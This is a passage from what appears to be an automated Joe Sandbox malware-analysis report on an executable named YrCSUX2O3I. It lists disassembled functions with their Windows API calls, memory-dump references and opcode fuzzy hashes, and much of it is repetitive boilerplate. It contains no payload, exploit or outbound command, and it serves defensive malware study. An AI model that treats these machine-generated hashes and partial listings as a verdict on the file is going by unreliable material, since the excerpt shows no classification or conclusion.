                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCreate
                                                            • String ID:
                                                            • API String ID: 415043291-0
                                                            • Opcode ID: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                            • Instruction ID: 1eb9dddf645dfc1e42ea27fadde30db719d7f554b9b2fef872a17e27e5e15d7e
                                                            • Opcode Fuzzy Hash: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                            • Instruction Fuzzy Hash: C0D09E71654601EFEF098F20DE16F6EBBA2EB84B00F11952DB692940E0DA7158199B15
                                                            Function 004059AA Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,00405599,?,?,00000000,00405785,?,?,?,?), ref: 004059AF
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 004059C3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
                                                            • Instruction ID: 5089437a0038f9672fdec650e2f42df5ceafcb3a9c98f83db2fa6512ef2061e4
                                                            • Opcode Fuzzy Hash: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
                                                            • Instruction Fuzzy Hash: 09D012B2504520EFC2103728EF0C89BBF65DB543717028B35FDB5A22F0CB304C568A99
                                                            Function 00402251 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402288
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringWrite
                                                            • String ID:
                                                            • API String ID: 390214022-0
                                                            • Opcode ID: 45cd240e89cb35acd2adb5c5489ef0982fec4b8f4934da7d4fbc5eb992d52d3a
                                                            • Instruction ID: 0b657d416b15e43c0193b3f865d343ab07691dd64d9d569c69532df3a91b5b61
                                                            • Opcode Fuzzy Hash: 45cd240e89cb35acd2adb5c5489ef0982fec4b8f4934da7d4fbc5eb992d52d3a
                                                            • Instruction Fuzzy Hash: 82E0BF32A045696ADB2036F20E8D97F30589B54754F15057FB513BA1C2DDFC0D815AAD
                                                            Function 00403160 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F8B,000000FF,00000004,00000000,00000000,00000000), ref: 00403177
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 233ad9278b8c44b78323ef9ef70cff2e7f1b2f0f6aab1e28ab7980f1b25ba47d
                                                            • Instruction ID: 71aeb53177ba50d05d0cf1bc79962ee68b95cc51097d41dc468827112562ad25
                                                            • Opcode Fuzzy Hash: 233ad9278b8c44b78323ef9ef70cff2e7f1b2f0f6aab1e28ab7980f1b25ba47d
                                                            • Instruction Fuzzy Hash: 88E08C32114218BBCF205FA19C04AE73F5CEB093A2F00C03ABD18E9290D234DA15DBE8
                                                            Function 00402BDA Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
                                                            • Instruction ID: 3dbf039cb61568b40e8fd4d19fef357c16506d2f59f835c7eaccd1bdbf02c8de
                                                            • Opcode Fuzzy Hash: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
                                                            • Instruction Fuzzy Hash: A3E04676290108AFDB00EFA4EE4AFD93BECAB08704F008021B609E6091DA74F5408B6C
                                                            Function 00402293 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileString
                                                            • String ID:
                                                            • API String ID: 1096422788-0
                                                            • Opcode ID: 74d14b167e5f6999f806f0de9605a955cbc6b2f8afcacdbae3200fcd2487e3c0
                                                            • Instruction ID: 032603440061492facc866799902dc36791b8dee2dcfc8dfbdbcdfe83c4889f9
                                                            • Opcode Fuzzy Hash: 74d14b167e5f6999f806f0de9605a955cbc6b2f8afcacdbae3200fcd2487e3c0
                                                            • Instruction Fuzzy Hash: FCE0BF71940208BADB10AFA1CD49AED3A68EF01754F10443AF552BB0D1EAF995C1AB59
                                                            Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: e8bb238b6c1997d302efcbd6551df5b11c37b88c8e9cb2d5373f431501d37c19
                                                            • Instruction ID: 561d33903432245b5a5ec808ba248510e0ad320ee7677a05499f6c71c576feb8
                                                            • Opcode Fuzzy Hash: e8bb238b6c1997d302efcbd6551df5b11c37b88c8e9cb2d5373f431501d37c19
                                                            • Instruction Fuzzy Hash: 54D01772704112DBCB10EBE9AA0869D7AA49B41369F204537D212F21D0D6B89585AB2E
                                                            Function 00403FE1 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
                                                            • Instruction ID: d706231c2cc37d53405596eccba3c731e42e433def08e4c59de364e12d4351e7
                                                            • Opcode Fuzzy Hash: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
                                                            • Instruction Fuzzy Hash: 3EC09B757447017FEA108F609D47F1777687B64702F1844397640F50D0CBB4D510DA1C
                                                            Function 00403FCA Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000028,?,00000001,00403DF6), ref: 00403FD8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
                                                            • Instruction ID: 691050d084ac05b3cc339cea154a0297f3c15b89657cbedd253a0759ece72884
                                                            • Opcode Fuzzy Hash: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
                                                            • Instruction Fuzzy Hash: 23B01236181A00BFDF114B10EE0AF857E62F7AC701F018438B340240F0CBF200A0DB08
                                                            Function 00403192 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC6,?,?,?,?,00000000,004033FE,?), ref: 004031A0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                            • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                            • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                            • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                            Function 00403FB7 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(?,00403D8F), ref: 00403FC1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
                                                            • Instruction ID: d41632a2b0a6fb41d9385d651c54052ae940fbff5a4ac867539882f0f930e1f3
                                                            • Opcode Fuzzy Hash: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
                                                            • Instruction Fuzzy Hash: 92A01132800200EFCE0A8B80EF0AC0ABB22BBA0300B008038A280800308A320830EB08

                                                            Non-executed Functions

                                                            Function 00404976 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003F9), ref: 0040498E
                                                            • GetDlgItem.USER32(?,00000408), ref: 00404999
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 004049E3
                                                            • LoadBitmapW.USER32(0000006E), ref: 004049F6
                                                            • SetWindowLongW.USER32(?,000000FC,00404F6E), ref: 00404A0F
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A23
                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A35
                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404A4B
                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A57
                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A69
                                                            • DeleteObject.GDI32(00000000), ref: 00404A6C
                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404A97
                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AA3
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B39
                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404B64
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B78
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404BA7
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BB5
                                                            • ShowWindow.USER32(?,00000005), ref: 00404BC6
                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CC3
                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D81
                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404D96
                                                            • GlobalFree.KERNEL32(?), ref: 00404DA6
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1F
